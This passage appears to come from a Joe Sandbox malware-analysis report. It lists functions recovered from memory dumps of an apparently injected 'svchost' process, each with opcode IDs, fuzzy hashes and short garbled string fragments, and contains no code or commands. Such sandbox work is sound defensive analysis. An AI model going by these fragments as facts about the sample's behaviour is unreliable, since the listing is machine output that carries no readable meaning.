                                                                    • Instruction Fuzzy Hash: F6428BB0A00346CFCB25DF29C9946EAB7F2BF85305F14486ED4068B6A0EB75EC85DB51
                                                                    Function 075D9BD0 Relevance: .5, Instructions: 468COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7bb34461a31876762b7356bc35411557963debbfc8cbd809dec6a9461cf1df17
                                                                    • Instruction ID: 0d202c00e5f8eac15a3102c6f080d38f71ca46d113d38ed3353b0bcafd26a89c
                                                                    • Opcode Fuzzy Hash: 7bb34461a31876762b7356bc35411557963debbfc8cbd809dec6a9461cf1df17
                                                                    • Instruction Fuzzy Hash: 161251B4A002059FCB15DF68C5849AABBF2FF89310B15C59AE509DB362DB30ED45CBA1
                                                                    Function 0761A157 Relevance: .5, Instructions: 455COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2937502879.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7610000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ea2c41ffe45158ace0f449d29e99e4a12aca83c20207b5c9709b1d4d32c0b287
                                                                    • Instruction ID: e1db82d140b182d6b4fd31fd92c82c028c4d6c3e5e535b1cb1a6f8423218dd2e
                                                                    • Opcode Fuzzy Hash: ea2c41ffe45158ace0f449d29e99e4a12aca83c20207b5c9709b1d4d32c0b287
                                                                    • Instruction Fuzzy Hash: 8022E6B4A11229CFCB55DF68C898A99B7F6FF88300F1484D9D94AA7354DB34AE81DF40
                                                                    Function 075D7478 Relevance: .4, Instructions: 406COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8c8169845c28bff9b61533f851b417396be2645ac2118d5f88ec57c9571b1563
                                                                    • Instruction ID: 162c2eeee8f8bbe21c7f57f3a5d8db574ed7871b89e891a6ca47dba61355216a
                                                                    • Opcode Fuzzy Hash: 8c8169845c28bff9b61533f851b417396be2645ac2118d5f88ec57c9571b1563
                                                                    • Instruction Fuzzy Hash: F9026BB5A00746CFDB25CF69C584AAABBF2FF48300F15896AE4469B761DB34EC45CB40
                                                                    Function 075D2AA8 Relevance: .4, Instructions: 401COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1421ddb52d44a323fedb269fa46009f30d53aae12163d0d15a54f337ec5c77c2
                                                                    • Instruction ID: 02c3b5744d60cada8f09335c697f6f7b2ac231068df4f5c72f745ce71d997248
                                                                    • Opcode Fuzzy Hash: 1421ddb52d44a323fedb269fa46009f30d53aae12163d0d15a54f337ec5c77c2
                                                                    • Instruction Fuzzy Hash: DEF12EB4A103059FDB18DFA8D894AEDBBB2FF88300F148969E406AB355DB35DC46DB50
                                                                    Function 017F6CA8 Relevance: .3, Instructions: 266COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b620e32917ec8aeea422cadd8d178151db950639a40e07d0af0ce9f5e7efc5bb
                                                                    • Instruction ID: f1ccc77e5bdc23dce45930be2017ea0f6356f07cbd85c50347316d1a7e1b6d5c
                                                                    • Opcode Fuzzy Hash: b620e32917ec8aeea422cadd8d178151db950639a40e07d0af0ce9f5e7efc5bb
                                                                    • Instruction Fuzzy Hash: F0B10771E002098FDF14CFA9C98579EFBF2AF88714F14852DE915AB394EB749885CB81
                                                                    Function 017F4A54 Relevance: .2, Instructions: 172COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dec26ff033ae34dafe2a0b9f1e2194210de5d0ce2a329c9f676d48f56c2c90e8
                                                                    • Instruction ID: 4ee6408f4603aa404f0a257c519e2c622bd3d825661e292cff9e0bb83c12078b
                                                                    • Opcode Fuzzy Hash: dec26ff033ae34dafe2a0b9f1e2194210de5d0ce2a329c9f676d48f56c2c90e8
                                                                    • Instruction Fuzzy Hash: 487112B0D00249DFDB10CFA9C984ADEBFF5EF48314F248059E51AAB354DB75A94ACB90
                                                                    Function 017F236F Relevance: 5.4, Strings: 4, Instructions: 447COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: afq$ afq$,$xjq
                                                                    • API String ID: 0-1502000904
                                                                    • Opcode ID: f74e9ffa8d210d2c85cfac38c6de9ca4ec13251d8390ee7f58c71f90d874bd19
                                                                    • Instruction ID: 1332ebbd9e1f4ce722a27298db8c28d40171b92530be7c64209c5b2cd7c86251
                                                                    • Opcode Fuzzy Hash: f74e9ffa8d210d2c85cfac38c6de9ca4ec13251d8390ee7f58c71f90d874bd19
                                                                    • Instruction Fuzzy Hash: E702BC70B00201CFD715DF28E594B2AB7A2FB88314F20856DDA169B3A6DF75DC45CB91
                                                                    Function 075CE560 Relevance: 4.2, Strings: 3, Instructions: 415COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #3Wk^$33Wk^$2Wk^
                                                                    • API String ID: 0-3380813285
                                                                    • Opcode ID: bf27b01f5ad3f6a60e567019665de26254a1af7d98fcb6a6c28b2b6ea549641e
                                                                    • Instruction ID: 709d1ffbbabfd77582f310aae9cc30701c9394527793b63fb53ba19be037102c
                                                                    • Opcode Fuzzy Hash: bf27b01f5ad3f6a60e567019665de26254a1af7d98fcb6a6c28b2b6ea549641e
                                                                    • Instruction Fuzzy Hash: 17E149F0B106469FCB15DAA8E951BDA77E2FB85740B10892EE816DB344EB34DC058B94
                                                                    Function 017F25AA Relevance: 3.9, Strings: 3, Instructions: 183COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: afq$ afq$xjq
                                                                    • API String ID: 0-3115423142
                                                                    • Opcode ID: 7a9912439855c8200166a1ff5d3a5a244436e87c4c79f3b4f657d47d1376156c
                                                                    • Instruction ID: cebb11339983cf5b09fc572ee09ffde6b04bc861521267ff7f25e74773d8d15b
                                                                    • Opcode Fuzzy Hash: 7a9912439855c8200166a1ff5d3a5a244436e87c4c79f3b4f657d47d1376156c
                                                                    • Instruction Fuzzy Hash: 66617970700300DFD719DB28E854B5ABBB2FB89354F20896DDA069B3A5DF729D45CB90
                                                                    Function 017F0EBC Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (jq$Tefq$dp
                                                                    • API String ID: 0-640866979
                                                                    • Opcode ID: 607be32b941604f6be36eecfcc0ae5ca30fc1c5a2ba50e8516dfdbbb4c4b1065
                                                                    • Instruction ID: d2b1b90b707a2bc8b8ad900cae71153d639a1f7bf0791358e379634c8f8cf3f4
                                                                    • Opcode Fuzzy Hash: 607be32b941604f6be36eecfcc0ae5ca30fc1c5a2ba50e8516dfdbbb4c4b1065
                                                                    • Instruction Fuzzy Hash: C9519D34B101149FCB44DF6DC458A5EBBF6BF89710F2580A9E606EB3A5CA71DC01CB90
                                                                    Function 017F93A8 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq$4'fq$LRfq
                                                                    • API String ID: 0-634477706
                                                                    • Opcode ID: 9c806694be2052c7bfcdc78beba7fd01da911f72715236bfa7cc52e2823a8cf2
                                                                    • Instruction ID: bdfa55ccd220943e6d91a3ec0ff351c25aacdd2c033f0ea8355f5e627f78a336
                                                                    • Opcode Fuzzy Hash: 9c806694be2052c7bfcdc78beba7fd01da911f72715236bfa7cc52e2823a8cf2
                                                                    • Instruction Fuzzy Hash: 6231A330B04106DBCB48EBBCE4557AFBBB1FB85314F10459DE6059B2A5EB356D058782
                                                                    Function 075DD0D0 Relevance: 2.9, Strings: 2, Instructions: 405COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,jq$,jq
                                                                    • API String ID: 0-3554820393
                                                                    • Opcode ID: 6bf6c02d0c90fe304b88f5d58edc068345ef6bb8a2392cf3a75c519054c1d094
                                                                    • Instruction ID: 0aa6defc5471bc2afffabb97f3e90749d2eb79f235a5fd359d4d7c290ab1f347
                                                                    • Opcode Fuzzy Hash: 6bf6c02d0c90fe304b88f5d58edc068345ef6bb8a2392cf3a75c519054c1d094
                                                                    • Instruction Fuzzy Hash: C8E138B47102028FCB54DF7DC998A6A77F6BF8961471584AAE906CB375EE70EC01CB90
                                                                    Function 075CFAF8 Relevance: 2.7, Strings: 2, Instructions: 249COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,jq$K+
                                                                    • API String ID: 0-517921994
                                                                    • Opcode ID: e2e3c9877532489cf0809c0881982d3f18ba88f90d4532f38473caa8c401e468
                                                                    • Instruction ID: cba29b4017d7972b1f85baadabfae0f0e0f76e414238b1b111fc0885cd93b0fb
                                                                    • Opcode Fuzzy Hash: e2e3c9877532489cf0809c0881982d3f18ba88f90d4532f38473caa8c401e468
                                                                    • Instruction Fuzzy Hash: EFA13FB1B102069FCB14DFA8C554A9EB7B3FF88704B10855AD9069B3A8DF70ED46CB90
                                                                    Function 017F6A20 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl$\VZl
                                                                    • API String ID: 0-3226392100
                                                                    • Opcode ID: 1e4d4f91159b9139e167bed18a39b29e8df7801f7f0ffb57b375dc89bbaaf70c
                                                                    • Instruction ID: 0429e25d79d53546ec4159cb78b385ebf53f7a56e4c3ff0460bb3c9a02e5408f
                                                                    • Opcode Fuzzy Hash: 1e4d4f91159b9139e167bed18a39b29e8df7801f7f0ffb57b375dc89bbaaf70c
                                                                    • Instruction Fuzzy Hash: BF7127B0E002098FDB14CFA9C98579EFBF2EF88714F14812DE519AB354EB749885CB91
                                                                    Function 017F6A14 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl$\VZl
                                                                    • API String ID: 0-3226392100
                                                                    • Opcode ID: 9146db292330328c19e213302b81ca69514bde83db2d821cb00f57e2c93b9647
                                                                    • Instruction ID: f8ec6e0b2a82f8f881e301b43ba2dbc99bd1137265bc067fc63f1081cea08ba1
                                                                    • Opcode Fuzzy Hash: 9146db292330328c19e213302b81ca69514bde83db2d821cb00f57e2c93b9647
                                                                    • Instruction Fuzzy Hash: DB7116B1E00209CFDB14CFA9C98579EFBF2EF88314F148129E519AB354EB749985CB91
                                                                    Function 017F0D20 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hjq$dLlq
                                                                    • API String ID: 0-3820807802
                                                                    • Opcode ID: 01979f515660a3267ddd31d8e420a681e9e8750660e1c79bb2c4c1050bec9fef
                                                                    • Instruction ID: 2a2e8f1d2d26f9bafeebf5430f4cd9f5e52abf49e634768c112b2d65165d8cc7
                                                                    • Opcode Fuzzy Hash: 01979f515660a3267ddd31d8e420a681e9e8750660e1c79bb2c4c1050bec9fef
                                                                    • Instruction Fuzzy Hash: 7B51B271B042449FCB15DF78C458A9EBFF7AF89200F1444AEE605EB3A2CA759C45CB91
                                                                    Function 017F9958 Relevance: 2.6, Strings: 2, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $fq$$fq
                                                                    • API String ID: 0-2537786760
                                                                    • Opcode ID: dd80eb181721aa7a9caad5afcbcf71904766e983e8bc90ab51b39b5428b59b02
                                                                    • Instruction ID: b17283d65e4aeabb20f8e5bbc6f9fc8b35001f9bd25045a3c6d6aa6bdbd0c7ac
                                                                    • Opcode Fuzzy Hash: dd80eb181721aa7a9caad5afcbcf71904766e983e8bc90ab51b39b5428b59b02
                                                                    • Instruction Fuzzy Hash: 77417A70604516CBCB19AF69940862AFB77BBC4719338899CF3069B399CB31DD16CB85
                                                                    Function 075DBAFA Relevance: 1.7, Strings: 1, Instructions: 433COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hbgq
                                                                    • API String ID: 0-956894282
                                                                    • Opcode ID: c8140831c69f6aa6f4d0c193ce89bc685b672b3c2f416673e9fe75812c3ed5e9
                                                                    • Instruction ID: bda5c4b9f7b669cf7599814afee53a85e0b28fe77a01b2ed79d27aff6ad6a080
                                                                    • Opcode Fuzzy Hash: c8140831c69f6aa6f4d0c193ce89bc685b672b3c2f416673e9fe75812c3ed5e9
                                                                    • Instruction Fuzzy Hash: 1B022BB5A00206DFCB15DFA8C48099EBBF2FF89310F15859AE8099B761DB30ED45CB91
                                                                    Function 075C8DF0 Relevance: 1.7, Strings: 1, Instructions: 403COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $fq
                                                                    • API String ID: 0-12477121
                                                                    • Opcode ID: 6339b7f7b6a377857947be9d7a08d94e1af8407b0ba9f1167c9ffd7ebf0b190d
                                                                    • Instruction ID: 8de5070379d7e2acaeab4a1d78cef564192acb79489d783e791cca8ea20018ba
                                                                    • Opcode Fuzzy Hash: 6339b7f7b6a377857947be9d7a08d94e1af8407b0ba9f1167c9ffd7ebf0b190d
                                                                    • Instruction Fuzzy Hash: A8F12FB4B002069FCB14DFA9C494AAEB7F6BF89710B15856EE905EB354DB31EC41CB90
                                                                    Function 017F63CE Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl
                                                                    • API String ID: 0-3439240617
                                                                    • Opcode ID: 2657ca856e56a6280eea59c25f2c10ca1ce287c153016cb12c168f697403b0f3
                                                                    • Instruction ID: 64608aa66011a06f57d5100d4299b4afc9260b1040f7522271ea4272838a91b1
                                                                    • Opcode Fuzzy Hash: 2657ca856e56a6280eea59c25f2c10ca1ce287c153016cb12c168f697403b0f3
                                                                    • Instruction Fuzzy Hash: 6CB12A70E00219CFDB10DFA9C9857AEFBF2AF88314F14812DEA15A7394EB749945CB91
                                                                    Function 075CEC88 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: 90c1ee4bbb98c6e24ffe095ef0998a95a926afb6659d8b0fbadff16e0949918b
                                                                    • Instruction ID: 05926776452008154aea2495aecf11c1e5eb74750f441ce16c7accabbc9cf263
                                                                    • Opcode Fuzzy Hash: 90c1ee4bbb98c6e24ffe095ef0998a95a926afb6659d8b0fbadff16e0949918b
                                                                    • Instruction Fuzzy Hash: E391A0B07002069FC715DAA9C8616EA7BEAFFC9300F54886EE905CB255DF31DC42C7A1
                                                                    Function 076CD8B0 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Dmq
                                                                    • API String ID: 0-4031372824
                                                                    • Opcode ID: aab6332ace9a24b4316db7e71b96db894afb645d1833cf6e13ac9f2e9bf9ae62
                                                                    • Instruction ID: e091d3dd2efc2a503df6890e979bd7c818007f23f73896dca444450582013f33
                                                                    • Opcode Fuzzy Hash: aab6332ace9a24b4316db7e71b96db894afb645d1833cf6e13ac9f2e9bf9ae62
                                                                    • Instruction Fuzzy Hash: 7381BDB4B002049FC718EF69E494A6ABBE6FF88310F14846DD50A9B3A5DF34EC41CB94
                                                                    Function 0818C0D0 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2939551408.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_8170000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Dmq
                                                                    • API String ID: 0-4031372824
                                                                    • Opcode ID: 4da363e79b1f127ff1cec9d604fa658dc8ab667f33f7136fe23c2ee44b5fca35
                                                                    • Instruction ID: cad5fb543e3ab434026f373a0ffd4ea13c9d5bde5f7c18bac74c7223b2a1656a
                                                                    • Opcode Fuzzy Hash: 4da363e79b1f127ff1cec9d604fa658dc8ab667f33f7136fe23c2ee44b5fca35
                                                                    • Instruction Fuzzy Hash: 19818E74B002049FC758EF68E494A6ABBF2FF89310F148569D8059B3A1DF34AC46CFA0
                                                                    Function 075CDE61 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hjq
                                                                    • API String ID: 0-3368716452
                                                                    • Opcode ID: db1d05a0e2bef24348db03e7c6abe2405b83f671fd9c4c69463acb8b66222f7b
                                                                    • Instruction ID: 02315401dd966fef986982cce28746e5b375a6aa76b58dccfbb6e0498a3f3d96
                                                                    • Opcode Fuzzy Hash: db1d05a0e2bef24348db03e7c6abe2405b83f671fd9c4c69463acb8b66222f7b
                                                                    • Instruction Fuzzy Hash: F971A2B1B002459FCB05DFA8D8549AEBBB6FFC9210B14845AE505DB362CB35ED05CBA1
                                                                    Function 017FA0E8 Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: xjq
                                                                    • API String ID: 0-3434123017
                                                                    • Opcode ID: 9bfcab43fecc198838323f974f41a06b4482733edff97d4514ae3e3552fc7db9
                                                                    • Instruction ID: 1cb65f11150ef364125f558784f61c4ac2b0ddebac4d3b3eb64ee50f83f38243
                                                                    • Opcode Fuzzy Hash: 9bfcab43fecc198838323f974f41a06b4482733edff97d4514ae3e3552fc7db9
                                                                    • Instruction Fuzzy Hash: F9915B74A00301CFD726CF1CE548716BBB1F785324F20952DCB1687BA8DB769A85CB92
                                                                    Function 075CD451 Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: 01526222313c455244dbb8dc768e1cd5896f8da7dfe857cbe88ea58a459154a8
                                                                    • Instruction ID: dc10691fd739b04da7732a8174d5825c0be0aa157a8bae6d8df5a7c92839f2e7
                                                                    • Opcode Fuzzy Hash: 01526222313c455244dbb8dc768e1cd5896f8da7dfe857cbe88ea58a459154a8
                                                                    • Instruction Fuzzy Hash: 7981FAB4B007468FCB24DFA5D4947AEBBF6BF84350F24852DD816DB294DB34A841CB40
                                                                    Function 075CFAE8 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K+
                                                                    • API String ID: 0-1526790930
                                                                    • Opcode ID: 0087d48ecd393edc16dada82fd9b2761ee0cab7d38f9ec78d33ecc2f9cd73886
                                                                    • Instruction ID: 19a3cc58659fea2bf59ac19533fcc5ba91c10e56b65a72d673c173726b52b92e
                                                                    • Opcode Fuzzy Hash: 0087d48ecd393edc16dada82fd9b2761ee0cab7d38f9ec78d33ecc2f9cd73886
                                                                    • Instruction Fuzzy Hash: 2E714DB1A0060A9FC718DFA8C594ADEB7F2FF85710B10855AE905AB3A4DF70ED45CB90
                                                                    Function 076C4028 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ;&Vk^
                                                                    • API String ID: 0-2130195118
                                                                    • Opcode ID: cb9d8676c065fdb695bd953c60fb3a728be10192ffac1dd22e01676642d23acf
                                                                    • Instruction ID: 70e8a65615be82fa21f1caacba849bd820cee55aa109f012459ea05fa05a2923
                                                                    • Opcode Fuzzy Hash: cb9d8676c065fdb695bd953c60fb3a728be10192ffac1dd22e01676642d23acf
                                                                    • Instruction Fuzzy Hash: D1615B75B002458FCB14DB78D468AAEBBF2EF89215F10806DE406DB365DF319C81CB90
                                                                    Function 075CF729 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $fq
                                                                    • API String ID: 0-12477121
                                                                    • Opcode ID: b81c5dc1acfc1ceb29f87d7a24968569c5e595be6ec1c9858e5ed97bd1588b4f
                                                                    • Instruction ID: 7e836d899873eea65746a877c2801082b3d66d042daa0b6e1e112bf5fb673cab
                                                                    • Opcode Fuzzy Hash: b81c5dc1acfc1ceb29f87d7a24968569c5e595be6ec1c9858e5ed97bd1588b4f
                                                                    • Instruction Fuzzy Hash: 8D614D76A00205DFD714DFA9D558AEDB7B6FB88321F10806AE806E7290DB359C45CBA0
                                                                    Function 075DCB38 Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
